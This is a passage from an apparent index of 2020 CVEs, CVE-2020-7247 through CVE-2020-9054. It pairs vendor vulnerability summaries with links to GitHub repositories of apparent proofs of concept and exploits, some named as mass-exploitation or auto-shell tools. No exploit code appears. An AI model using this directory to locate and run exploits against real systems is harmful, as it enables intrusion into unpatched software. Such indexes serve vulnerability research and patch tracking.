- [arafatansari/SecAssignment](https://github.com/arafatansari/SecAssignment)
- [pswalia2u/CVE-2020-7246](https://github.com/pswalia2u/CVE-2020-7246)

### CVE-2020-7247 (2020-01-29)

smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.

- [FiroSolutions/cve-2020-7247-exploit](https://github.com/FiroSolutions/cve-2020-7247-exploit)
- [superzerosec/cve-2020-7247](https://github.com/superzerosec/cve-2020-7247)
- [r0lh/CVE-2020-7247](https://github.com/r0lh/CVE-2020-7247)
- [QTranspose/CVE-2020-7247-exploit](https://github.com/QTranspose/CVE-2020-7247-exploit)
- [bytescrappers/CVE-2020-7247](https://github.com/bytescrappers/CVE-2020-7247)
- [f4T1H21/CVE-2020-7247](https://github.com/f4T1H21/CVE-2020-7247)
- [SimonSchoeni/CVE-2020-7247-POC](https://github.com/SimonSchoeni/CVE-2020-7247-POC)
- [presentdaypresenttime/shai_hulud](https://github.com/presentdaypresenttime/shai_hulud)

### CVE-2020-7283 (2020-07-03)

Privilege Escalation vulnerability in McAfee Total Protection (MTP) before 16.0.R26 allows local users to create and edit files via symbolic link manipulation in a location they would otherwise not have access to. This is achieved through running a malicious script or program on the target machine.

- [RedyOpsResearchLabs/CVE-2020-7283-McAfee-Total-Protection-MTP-16.0.R26-EoP](https://github.com/RedyOpsResearchLabs/CVE-2020-7283-McAfee-Total-Protection-MTP-16.0.R26-EoP)

### CVE-2020-7352 (2020-08-06)

The GalaxyClientService component of GOG Galaxy runs with elevated SYSTEM privileges in a Windows environment. Due to the software shipping with embedded, static RSA private key, an attacker with this key material and local user permissions can effectively send any operating system command to the service for execution in this elevated context. The service listens for such commands on a locally-bound network port, localhost:9978. A Metasploit module has been published which exploits this vulnerability. This issue affects the 2.0.x branch of the software (2.0.12 and earlier) as well as the 1.2.x branch (1.2.64 and earlier). A fix was issued for the 2.0.x branch of the affected software.

- [szerszen199/PS-CVE-2020-7352](https://github.com/szerszen199/PS-CVE-2020-7352)

### CVE-2020-7378 (2020-11-24)

CRIXP OpenCRX version 4.30 and 5.0-20200717 and prior suffers from an unverified password change vulnerability. An attacker who is able to connect to the affected OpenCRX instance can change the password of any user, including admin-Standard, to any chosen value. This issue was resolved in version 5.0-20200904, released September 4, 2020.

- [ruthvikvegunta/openCRX-CVE-2020-7378](https://github.com/ruthvikvegunta/openCRX-CVE-2020-7378)

### CVE-2020-7384 (2020-10-29)

Rapid7's Metasploit msfvenom framework handles APK files in a way that allows for a malicious user to craft and publish a file that would execute arbitrary commands on a victim's machine.

- [nikhil1232/CVE-2020-7384](https://github.com/nikhil1232/CVE-2020-7384)
- [0xCarsonS/CVE-2020-7384](https://github.com/0xCarsonS/CVE-2020-7384)

### CVE-2020-7388 (2021-07-22)

Sage X3 Unauthenticated Remote Command Execution (RCE) as SYSTEM in AdxDSrv.exe component. By editing the client side authentication request, an attacker can bypass credential validation. While exploiting this does require knowledge of the installation path, that information can be learned by exploiting CVE-2020-7387. This issue was fixed in AdxAdmin 93.2.53, which ships with updates for on-premises versions of Sage X3 including Version 9 (components shipped with Syracuse 9.22.7.2 and later), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Version 11 (components shipped with Syracuse 11.25.2.6 and later), and Version 12 (components shipped with Syracuse 12.10.2.8 and later) of Sage X3. Other on-premises versions of Sage X3 are unsupported by the vendor.

- [ac3lives/sagex3-cve-2020-7388-poc](https://github.com/ac3lives/sagex3-cve-2020-7388-poc)

### CVE-2020-7461 (2021-03-26)

In FreeBSD 12.1-STABLE before r365010, 11.4-STABLE before r365011, 12.1-RELEASE before p9, 11.4-RELEASE before p3, and 11.3-RELEASE before p13, dhclient(8) fails to handle certain malformed input related to handling of DHCP option 119, resulting in a heap overflow. The heap overflow could in principle be exploited to achieve remote code execution. The affected process runs with reduced privileges in a Capsicum sandbox, limiting the immediate impact of an exploit.

- [knqyf263/CVE-2020-7461](https://github.com/knqyf263/CVE-2020-7461)
- [0xkol/freebsd-dhclient-poc](https://github.com/0xkol/freebsd-dhclient-poc)

### CVE-2020-7471 (2020-02-03)

Django 1.11 before 1.11.28, 2.2 before 2.2.10, and 3.0 before 3.0.3 allows SQL Injection if untrusted data is used as a StringAgg delimiter (e.g., in Django applications that offer downloads of data as a series of rows with a user-specified column delimiter). By passing a suitably crafted delimiter to a contrib.postgres.aggregates.StringAgg instance, it was possible to break escaping and inject malicious SQL.

- [Saferman/CVE-2020-7471](https://github.com/Saferman/CVE-2020-7471)
- [secoba/DjVul_StringAgg](https://github.com/secoba/DjVul_StringAgg)
- [SNCKER/CVE-2020-7471](https://github.com/SNCKER/CVE-2020-7471)
- [Tempuss/CTF_CVE-2020-7471](https://github.com/Tempuss/CTF_CVE-2020-7471)
- [victomteng1997/cve-2020-7471-Time_Blind_SQLi-](https://github.com/victomteng1997/cve-2020-7471-Time_Blind_SQLi-)
- [huzaifakhan771/CVE-2020-7471-Django](https://github.com/huzaifakhan771/CVE-2020-7471-Django)
- [mrlihd/CVE-2020-7471](https://github.com/mrlihd/CVE-2020-7471)

### CVE-2020-7473 (2020-05-07)

In certain situations, all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020, allow unauthenticated attackers to access the documents and folders of ShareFile users. NOTE: unlike most CVEs, exploitability depends on the product version that was in use when a particular setup step was performed, NOT the product version that is in use during a current assessment of a CVE consumer's product inventory. Specifically, the vulnerability can be exploited if a storage zone was created by one of these product versions: 5.9.0, 5.8.0, 5.7.0, 5.6.0, 5.5.0, or earlier. This CVE differs from CVE-2020-8982 and CVE-2020-8983 but has essentially the same risk.

- [DimitriNL/CTX-CVE-2020-7473](https://github.com/DimitriNL/CTX-CVE-2020-7473)

### CVE-2020-7661 (2020-06-04)

All versions of url-regex are vulnerable to Regular Expression Denial of Service. An attacker providing a very long string in String.test can cause a Denial of Service.

- [spamscanner/url-regex-safe](https://github.com/spamscanner/url-regex-safe)

### CVE-2020-7693 (2020-07-09)

Incorrect handling of the Upgrade header with the value websocket leads to crashing of containers hosting sockjs apps. This affects the package sockjs before 0.3.20.

- [andsnw/sockjs-dos-py](https://github.com/andsnw/sockjs-dos-py)

### CVE-2020-7699 (2020-07-30)

This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.

- [hemaoqi-Tom/CVE-2020-7699_reproduce](https://github.com/hemaoqi-Tom/CVE-2020-7699_reproduce)

### CVE-2020-7740 (2020-10-06)

This affects all versions of package node-pdf-generator. Due to lack of user input validation and sanitization done to the content given to node-pdf-generator, it is possible for an attacker to craft a url that will be passed to an external server allowing an SSRF attack.

- [CS4239-U6/node-pdf-generator-ssrf](https://github.com/CS4239-U6/node-pdf-generator-ssrf)

### CVE-2020-7799 (2020-01-28)

An issue was discovered in FusionAuth before 1.11.0. An authenticated user, allowed to edit e-mail templates (Home -> Settings -> Email Templates) or themes (Home -> Settings -> Themes), can execute commands on the underlying operating system by abusing freemarker.template.utility.Execute in the Apache FreeMarker engine that processes custom templates.

- [Pikaqi/cve-2020-7799](https://github.com/Pikaqi/cve-2020-7799)
- [ianxtianxt/CVE-2020-7799](https://github.com/ianxtianxt/CVE-2020-7799)

### CVE-2020-7897
- [mooneee/cve-2020-7897](https://github.com/mooneee/cve-2020-7897)

### CVE-2020-7931 (2020-01-23)

In JFrog Artifactory 5.x and 6.x, insecure FreeMarker template processing leads to remote code execution, e.g., by modifying a .ssh/authorized_keys file. Patches are available for various versions between 5.11.8 and 6.16.0. The issue exists because use of the DefaultObjectWrapper class makes certain Java functions accessible to a template.

- [gquere/CVE-2020-7931](https://github.com/gquere/CVE-2020-7931)

### CVE-2020-7934 (2020-01-28)

In LifeRay Portal CE 7.1.0 through 7.2.1 GA2, the First Name, Middle Name, and Last Name fields for user accounts in MyAccountPortlet are all vulnerable to a persistent XSS issue. Any user can modify these fields with a particular XSS payload, and it will be stored in the database. The payload will then be rendered when a user utilizes the search feature to search for other users (i.e., if a user with modified fields occurs in the search results). This issue was fixed in Liferay Portal CE version 7.3.0 GA1.

- [3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934](https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934)
- [Sergio235705/audit-xss-cve-2020-7934](https://github.com/Sergio235705/audit-xss-cve-2020-7934)

### CVE-2020-7961 (2020-03-20)

Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).

- [mzer0one/CVE-2020-7961-POC](https://github.com/mzer0one/CVE-2020-7961-POC)
- [wcxxxxx/CVE-2020-7961](https://github.com/wcxxxxx/CVE-2020-7961)
- [thelostworldFree/CVE-2020-7961-payloads](https://github.com/thelostworldFree/CVE-2020-7961-payloads)
- [shacojx/LifeRCEJsonWSTool-POC-CVE-2020-7961-Gui](https://github.com/shacojx/LifeRCEJsonWSTool-POC-CVE-2020-7961-Gui)
- [shacojx/GLiferay-CVE-2020-7961-golang](https://github.com/shacojx/GLiferay-CVE-2020-7961-golang)
- [shacojx/POC-CVE-2020-7961-Token-iterate](https://github.com/shacojx/POC-CVE-2020-7961-Token-iterate)
- [ShutdownRepo/CVE-2020-7961](https://github.com/ShutdownRepo/CVE-2020-7961)
- [CrackerCat/CVE-2020-7961-Mass](https://github.com/CrackerCat/CVE-2020-7961-Mass)
- [pashayogi/CVE-2020-7961-Mass](https://github.com/pashayogi/CVE-2020-7961-Mass)
- [manrop2702/CVE-2020-7961](https://github.com/manrop2702/CVE-2020-7961)
- [NMinhTrung/LIFERAY-CVE-2020-7961](https://github.com/NMinhTrung/LIFERAY-CVE-2020-7961)

### CVE-2020-7980 (2020-01-25)

Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.

- [Xh4H/Satellian-CVE-2020-7980](https://github.com/Xh4H/Satellian-CVE-2020-7980)

### CVE-2020-8004 (2020-04-06)

STMicroelectronics STM32F1 devices have Incorrect Access Control.

- [wuxx/CVE-2020-8004](https://github.com/wuxx/CVE-2020-8004)

### CVE-2020-8012 (2020-02-18)

CA Unified Infrastructure Management (Nimsoft/UIM) 20.1, 20.3.x, and 9.20 and below contains a buffer overflow vulnerability in the robot (controller) component. A remote attacker can execute arbitrary code.

- [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development)

### CVE-2020-8103 (2020-06-05)

A vulnerability in the improper handling of symbolic links in Bitdefender Antivirus Free can allow an unprivileged user to substitute a quarantined file, and restore it to a privileged location. This issue affects Bitdefender Antivirus Free versions prior to 1.0.17.178.

- [RedyOpsResearchLabs/-CVE-2020-8103-Bitdefender-Antivirus-Free-EoP](https://github.com/RedyOpsResearchLabs/-CVE-2020-8103-Bitdefender-Antivirus-Free-EoP)

### CVE-2020-8163 (2020-07-02)

There is a code injection vulnerability in versions of Rails prior to 5.0.1 that would allow an attacker who controlled the `locals` argument of a `render` call to perform a RCE.

- [lucasallan/CVE-2020-8163](https://github.com/lucasallan/CVE-2020-8163)
- [h4ms1k/CVE-2020-8163](https://github.com/h4ms1k/CVE-2020-8163)
- [RedPhantomRoot/CVE-2020-8163](https://github.com/RedPhantomRoot/CVE-2020-8163)

### CVE-2020-8165 (2020-06-19)

A deserialization of untrusted data vulnerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore, potentially resulting in an RCE.

- [masahiro331/CVE-2020-8165](https://github.com/masahiro331/CVE-2020-8165)
- [umiterkol/CVE-2020-8165--Auto-Shell](https://github.com/umiterkol/CVE-2020-8165--Auto-Shell)
- [taipansec/CVE-2020-8165](https://github.com/taipansec/CVE-2020-8165)
- [hybryx/CVE-2020-8165](https://github.com/hybryx/CVE-2020-8165)
- [AssassinUKG/CVE-2020-8165](https://github.com/AssassinUKG/CVE-2020-8165)
- [progfay/CVE-2020-8165](https://github.com/progfay/CVE-2020-8165)
- [danielklim/cve-2020-8165-demo](https://github.com/danielklim/cve-2020-8165-demo)

### CVE-2020-8175 (2020-07-24)

Uncontrolled resource consumption in `jpeg-js` before 0.4.0 may allow an attacker to launch denial of service attacks using a specially crafted JPEG image.

- [knokbak/get-pixels-updated](https://github.com/knokbak/get-pixels-updated)
- [knokbak/save-pixels-updated](https://github.com/knokbak/save-pixels-updated)

### CVE-2020-8193 (2020-07-10)

Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.

- [jas502n/CVE-2020-8193](https://github.com/jas502n/CVE-2020-8193)
- [Airboi/Citrix-ADC-RCE-CVE-2020-8193](https://github.com/Airboi/Citrix-ADC-RCE-CVE-2020-8193)
- [Zeop-CyberSec/citrix_adc_netscaler_lfi](https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi)
- [PR3R00T/CVE-2020-8193-Citrix-Scanner](https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner)
- [ctlyz123/CVE-2020-8193](https://github.com/ctlyz123/CVE-2020-8193)

### CVE-2020-8209 (2020-08-17)

Improper access control in Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6 and Citrix XenMobile Server before 10.9 RP5 leads to the ability to read arbitrary files.

- [B1anda0/CVE-2020-8209](https://github.com/B1anda0/CVE-2020-8209)

### CVE-2020-8218 (2020-07-30)

A code injection vulnerability exists in Pulse Connect Secure <9.1R8 that allows an attacker to craft a URI to perform arbitrary code execution via the admin web interface.

- [withdk/pulse-gosecure-rce-poc](https://github.com/withdk/pulse-gosecure-rce-poc)

### CVE-2020-8241 (2020-10-28)

A vulnerability in the Pulse Secure Desktop Client < 9.1R9 could allow the attacker to perform a MITM Attack if end users are convinced to connect to a malicious server.

- [withdk/pulse-secure-vpn-mitm-research](https://github.com/withdk/pulse-secure-vpn-mitm-research)

### CVE-2020-8248 (2020-10-28)

A vulnerability in the Pulse Secure Desktop Client (Linux) < 9.1R9 could allow local attackers to escalate privilege.

- [mbadanoiu/CVE-2020-8248](https://github.com/mbadanoiu/CVE-2020-8248)

### CVE-2020-8249 (2020-10-28)

A vulnerability in the Pulse Secure Desktop Client (Linux) < 9.1R9 could allow local attackers to perform a buffer overflow.

- [mbadanoiu/CVE-2020-8249](https://github.com/mbadanoiu/CVE-2020-8249)

### CVE-2020-8250 (2020-10-28)

A vulnerability in the Pulse Secure Desktop Client (Linux) < 9.1R9 could allow local attackers to escalate privilege.

- [mbadanoiu/CVE-2020-8250](https://github.com/mbadanoiu/CVE-2020-8250)

### CVE-2020-8254 (2020-10-28)

A vulnerability in the Pulse Secure Desktop Client < 9.1R9 has Remote Code Execution (RCE) if users can be convinced to connect to a malicious server. This vulnerability only affects Windows PDC. To improve the security of connections between Pulse clients and Pulse Connect Secure, see the recommendation below: Disable Dynamic certificate trust for PDC.

- [mbadanoiu/CVE-2020-8254](https://github.com/mbadanoiu/CVE-2020-8254)

### CVE-2020-8277 (2020-11-19)

A Node.js application that allows an attacker to trigger a DNS request for a host of their choice could trigger a Denial of Service in versions < 15.2.1, < 14.15.1, and < 12.19.1 by getting the application to resolve a DNS record with a larger number of responses. This is fixed in 15.2.1, 14.15.1, and 12.19.1.

- [masahiro331/CVE-2020-8277](https://github.com/masahiro331/CVE-2020-8277)
- [AndrewIjano/CVE-2020-8277](https://github.com/AndrewIjano/CVE-2020-8277)

### CVE-2020-8287 (2021-01-06)

Node.js versions before 10.23.1, 12.20.1, 14.15.4, 15.5.1 allow two copies of a header field in an HTTP request (for example, two Transfer-Encoding header fields). In this case, Node.js identifies the first header field and ignores the second. This can lead to HTTP Request Smuggling.

- [progfay/nodejs-http-transfer-encoding-smuggling-poc](https://github.com/progfay/nodejs-http-transfer-encoding-smuggling-poc)

### CVE-2020-8289 (2020-12-27)

Backblaze for Windows before 7.0.1.433 and Backblaze for macOS before 7.0.1.434 suffer from improper certificate validation in `bztransmit` helper due to hardcoded whitelist of strings in URLs where validation is disabled leading to possible remote code execution via client update functionality.

- [geffner/CVE-2020-8289](https://github.com/geffner/CVE-2020-8289)

### CVE-2020-8290 (2020-12-27)

Backblaze for Windows and Backblaze for macOS before 7.0.0.439 suffer from improper privilege management in `bztransmit` helper due to lack of permission handling and validation before creation of client update directories allowing for local escalation of privilege via rogue client update binary.

- [geffner/CVE-2020-8290](https://github.com/geffner/CVE-2020-8290)

### CVE-2020-8300 (2021-06-16)

Citrix ADC and Citrix/NetScaler Gateway before 13.0-82.41, 12.1-62.23, 11.1-65.20 and Citrix ADC 12.1-FIPS before 12.1-55.238 suffer from improper access control allowing SAML authentication hijack through a phishing attack to steal a valid user session. Note that Citrix ADC or Citrix Gateway must be configured as a SAML SP or a SAML IdP for this to be possible.

- [stuartcarroll/CitrixADC-CVE-2020-8300](https://github.com/stuartcarroll/CitrixADC-CVE-2020-8300)

### CVE-2020-8417 (2020-01-28)

The Code Snippets plugin before 2.14.0 for WordPress allows CSRF because of the lack of a Referer check on the import menu.

- [vulncrate/wp-codesnippets-cve-2020-8417](https://github.com/vulncrate/wp-codesnippets-cve-2020-8417)
- [waleweewe12/CVE-2020-8417](https://github.com/waleweewe12/CVE-2020-8417)
- [Rapidsafeguard/codesnippets_CVE-2020-8417](https://github.com/Rapidsafeguard/codesnippets_CVE-2020-8417)
- [Vulnmachines/WordPress_CVE-2020-8417](https://github.com/Vulnmachines/WordPress_CVE-2020-8417)

### CVE-2020-8423 (2020-04-02)

A buffer overflow in the httpd daemon on TP-Link TL-WR841N V10 (firmware version 3.16.9) devices allows an authenticated remote attacker to execute arbitrary code via a GET request to the page for the configuration of the Wi-Fi network.

- [lnversed/CVE-2020-8423](https://github.com/lnversed/CVE-2020-8423)

### CVE-2020-8437 (2020-03-02)

The bencoding parser in BitTorrent uTorrent through 3.5.5 (build 45505) misparses nested bencoded dictionaries, which allows a remote attacker to cause a denial of service.

- [mavlevin/uTorrent-CVE-2020-8437](https://github.com/mavlevin/uTorrent-CVE-2020-8437)

### CVE-2020-8515 (2020-02-01)

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.

- [imjdl/CVE-2020-8515-PoC](https://github.com/imjdl/CVE-2020-8515-PoC)
- [truerandom/nmap_draytek_rce](https://github.com/truerandom/nmap_draytek_rce)
- [darrenmartyn/CVE-2020-8515](https://github.com/darrenmartyn/CVE-2020-8515)

### CVE-2020-8554 (2021-01-21)

Kubernetes API server in all versions allows an attacker who is able to create a ClusterIP service and set the spec.externalIPs field to intercept traffic to that IP address. Additionally, an attacker who is able to patch the status (which is considered a privileged operation and should not typically be granted to users) of a LoadBalancer service can set the status.loadBalancer.ingress.ip to similar effect.

- [rancher/externalip-webhook](https://github.com/rancher/externalip-webhook)
- [jrmurray000/CVE-2020-8554](https://github.com/jrmurray000/CVE-2020-8554)
- [twistlock/k8s-cve-2020-8554-mitigations](https://github.com/twistlock/k8s-cve-2020-8554-mitigations)
- [Dviejopomata/CVE-2020-8554](https://github.com/Dviejopomata/CVE-2020-8554)
- [alebedev87/gatekeeper-cve-2020-8554](https://github.com/alebedev87/gatekeeper-cve-2020-8554)

### CVE-2020-8558 (2020-07-27)

The Kubelet and kube-proxy components in versions 1.1.0-1.16.10, 1.17.0-1.17.6, and 1.18.0-1.18.3 were found to contain a security issue which allows adjacent hosts to reach TCP and UDP services bound to 127.0.0.1 running on the node or in the node's network namespace. Such a service is generally thought to be reachable only by other processes on the same host, but due to this defect, could be reachable by other hosts on the same LAN as the node, or by containers running on the same node as the service.

- [tabbysable/POC-2020-8558](https://github.com/tabbysable/POC-2020-8558)
- [rhysemmas/martian-packets](https://github.com/rhysemmas/martian-packets)

### CVE-2020-8559 (2020-07-22)

The Kubernetes kube-apiserver in versions v1.6-v1.15, and versions prior to v1.16.13, v1.17.9 and v1.18.6, is vulnerable to an unvalidated redirect on proxied upgrade requests that could allow an attacker to escalate privileges from a node compromise to a full cluster compromise.

- [tabbysable/POC-2020-8559](https://github.com/tabbysable/POC-2020-8559)
- [tdwyer/CVE-2020-8559](https://github.com/tdwyer/CVE-2020-8559)

### CVE-2020-8597 (2020-02-03)

eap.c in pppd in ppp 2.4.2 through 2.4.8 has an rhostname buffer overflow in the eap_request and eap_response functions.

- [dointisme/CVE-2020-8597](https://github.com/dointisme/CVE-2020-8597)
- [WinMin/CVE-2020-8597](https://github.com/WinMin/CVE-2020-8597)
- [Dilan-Diaz/Point-to-Point-Protocol-Daemon-RCE-Vulnerability-CVE-2020-8597-](https://github.com/Dilan-Diaz/Point-to-Point-Protocol-Daemon-RCE-Vulnerability-CVE-2020-8597-)
- [lakwsh/CVE-2020-8597](https://github.com/lakwsh/CVE-2020-8597)

### CVE-2020-8617 (2020-05-19)

Using a specially-crafted message, an attacker may potentially cause a BIND server to reach an inconsistent state if the attacker knows (or successfully guesses) the name of a TSIG key used by the server. Since BIND, by default, configures a local session key even on servers whose configuration does not otherwise make use of it, almost all current BIND servers are vulnerable. In releases of BIND dating from March 2018 and after, an assertion check in tsig.c detects this inconsistent state and deliberately exits. Prior to the introduction of the check the server would continue operating in an inconsistent state, with potentially harmful results.

- [knqyf263/CVE-2020-8617](https://github.com/knqyf263/CVE-2020-8617)
- [gothburz/cve-2020-8617](https://github.com/gothburz/cve-2020-8617)

### CVE-2020-8635 (2020-03-06)

Wing FTP Server v6.2.3 for Linux, macOS, and Solaris sets insecure permissions on installation directories and configuration files. This allows local users to arbitrarily create FTP users with full privileges, and escalate privileges within the operating system by modifying system files.

- [Al1ex/CVE-2020-8635](https://github.com/Al1ex/CVE-2020-8635)

### CVE-2020-8637 (2020-04-03)

A SQL injection vulnerability in TestLink 1.9.20 allows attackers to execute arbitrary SQL commands in dragdroptreenodes.php via the node_id parameter.

- [DXY0411/CVE-2020-8637](https://github.com/DXY0411/CVE-2020-8637)

### CVE-2020-8644 (2020-02-05)

PlaySMS before 1.4.3 does not sanitize inputs from a malicious string.

- [H3rm1tR3b0rn/CVE-2020-8644-PlaySMS-1.4](https://github.com/H3rm1tR3b0rn/CVE-2020-8644-PlaySMS-1.4)

### CVE-2020-8809 (2020-02-25)

Gurux GXDLMS Director prior to 8.5.1905.1301 downloads updates to add-ins and OBIS code over an unencrypted HTTP connection. A man-in-the-middle attacker can prompt the user to download updates by modifying the contents of gurux.fi/obis/files.xml and gurux.fi/updates/updates.xml. Then, the attacker can modify the contents of downloaded files. In the case of add-ins (if the user is using those), this will lead to code execution. In case of OBIS codes (which the user is always using as they are needed to communicate with the energy meters), this can lead to code execution when combined with CVE-2020-8810.

- [seqred-s-a/gxdlmsdirector-cve](https://github.com/seqred-s-a/gxdlmsdirector-cve)

### CVE-2020-8813 (2020-02-22)

graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.

- [mhaskar/CVE-2020-8813](https://github.com/mhaskar/CVE-2020-8813)
- [0xm4ud/Cacti-CVE-2020-8813](https://github.com/0xm4ud/Cacti-CVE-2020-8813)
- [hexcowboy/CVE-2020-8813](https://github.com/hexcowboy/CVE-2020-8813)
- [p0dalirius/CVE-2020-8813-Cacti-RCE-in-graph_realtime](https://github.com/p0dalirius/CVE-2020-8813-Cacti-RCE-in-graph_realtime)

### CVE-2020-8816 (2020-05-29)

Pi-hole Web v4.3.2 (aka AdminLTE) allows Remote Code Execution by privileged dashboard users via a crafted DHCP static lease.

- [AndreyRainchik/CVE-2020-8816](https://github.com/AndreyRainchik/CVE-2020-8816)
- [martinsohn/CVE-2020-8816](https://github.com/martinsohn/CVE-2020-8816)
- [cybervaca/CVE-2020-8816](https://github.com/cybervaca/CVE-2020-8816)
- [team0se7en/CVE-2020-8816](https://github.com/team0se7en/CVE-2020-8816)

### CVE-2020-8825 (2020-02-10)

index.php?p=/dashboard/settings/branding in Vanilla 2.6.3 allows stored XSS.

- [hacky1997/CVE-2020-8825](https://github.com/hacky1997/CVE-2020-8825)

### CVE-2020-8835 (2020-04-02)

In the Linux kernel 5.5.0 and newer, the bpf verifier (kernel/bpf/verifier.c) did not properly restrict the register bounds for 32-bit operations, leading to out-of-bounds reads and writes in kernel memory. The vulnerability also affects the Linux 5.4 stable series, starting with v5.4.7, as the introducing commit was backported to that branch. This vulnerability was fixed in 5.6.1, 5.5.14, and 5.4.29. (issue is aka ZDI-CAN-10780)

- [Prabhashaka/Exploitation-CVE-2020-8835](https://github.com/Prabhashaka/Exploitation-CVE-2020-8835)
- [snappyJack/Rick_write_exp_CVE-2020-8835](https://github.com/snappyJack/Rick_write_exp_CVE-2020-8835)
- [zilong3033/CVE-2020-8835](https://github.com/zilong3033/CVE-2020-8835)
- [SplendidSky/CVE-2020-8835](https://github.com/SplendidSky/CVE-2020-8835)
- [digamma-ai/CVE-2020-8835-verification](https://github.com/digamma-ai/CVE-2020-8835-verification)

### CVE-2020-8840 (2020-02-10)

FasterXML jackson-databind 2.0.0 through 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter.

- [jas502n/jackson-CVE-2020-8840](https://github.com/jas502n/jackson-CVE-2020-8840)
- [Wfzsec/FastJson1.2.62-RCE](https://github.com/Wfzsec/FastJson1.2.62-RCE)
- [fairyming/CVE-2020-8840](https://github.com/fairyming/CVE-2020-8840)
- [Blyth0He/CVE-2020-8840](https://github.com/Blyth0He/CVE-2020-8840)
- [Veraxy00/CVE-2020-8840](https://github.com/Veraxy00/CVE-2020-8840)
- [dpredrag/CVE-2020-8840](https://github.com/dpredrag/CVE-2020-8840)

### CVE-2020-8888
- [SnipJoe/CVE-2020-8888](https://github.com/SnipJoe/CVE-2020-8888)

### CVE-2020-8950 (2020-02-12)

The AUEPLauncher service in Radeon AMD User Experience Program Launcher through 1.0.0.1 on Windows allows elevation of privilege by placing a crafted file in %PROGRAMDATA%\AMD\PPC\upload and then creating a symbolic link in %PROGRAMDATA%\AMD\PPC\temp that points to an arbitrary folder with an arbitrary file name.

- [sailay1996/amd_eop_poc](https://github.com/sailay1996/amd_eop_poc)

### CVE-2020-8958 (2020-07-15)

Guangzhou 1GE ONU V2801RW 1.9.1-181203 through 2.9.0-181024 and V2804RGW 1.9.1-181203 through 2.9.0-181024 devices allow remote attackers to execute arbitrary OS commands via shell metacharacters in the boaform/admin/formPing Dest IP Address field.

- [qurbat/CVE-2020-8958](https://github.com/qurbat/CVE-2020-8958)
- [Asjidkalam/CVE-2020-8958](https://github.com/Asjidkalam/CVE-2020-8958)

### CVE-2020-9006 (2020-02-17)

The Popup Builder plugin 2.2.8 through 2.6.7.6 for WordPress is vulnerable to SQL injection (in the sgImportPopups function in sg_popup_ajax.php) via PHP Deserialization on attacker-controlled data with the attachmentUrl POST variable. This allows creation of an arbitrary WordPress Administrator account, leading to possible Remote Code Execution because Administrators can run PHP code on Wordpress instances. (This issue has been fixed in the 3.x branch of popup-builder.)

- [s3rgeym/cve-2020-9006](https://github.com/s3rgeym/cve-2020-9006)

### CVE-2020-9008 (2020-02-25)

Stored Cross-site scripting (XSS) vulnerability in Blackboard Learn/PeopleTool v9.1 allows users to inject arbitrary web script via the Tile widget in the People Tool profile editor.

- [kyletimmermans/blackboard-xss](https://github.com/kyletimmermans/blackboard-xss)

### CVE-2020-9038 (2020-02-17)

Joplin through 1.0.184 allows Arbitrary File Read via XSS.

- [JavierOlmedo/CVE-2020-9038](https://github.com/JavierOlmedo/CVE-2020-9038)

### CVE-2020-9047 (2020-06-26)

A vulnerability exists that could allow the execution of unauthorized code or operating system commands on systems running exacqVision Web Service versions 20.06.3.0 and prior and exacqVision Enterprise Manager versions 20.06.4.0 and prior. An attacker with administrative privileges could potentially download and run a malicious executable that could allow OS command injection on the system.

- [norrismw/CVE-2020-9047](https://github.com/norrismw/CVE-2020-9047)

### CVE-2020-9054 (2020-03-04)

Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable device. For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0; NAS520 before firmware V5.21(AASZ.3)C0; NAS540 before firmware V5.21(AATB.4)C0; NAS542 before firmware V5.21(ABAG.4)C0. ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are 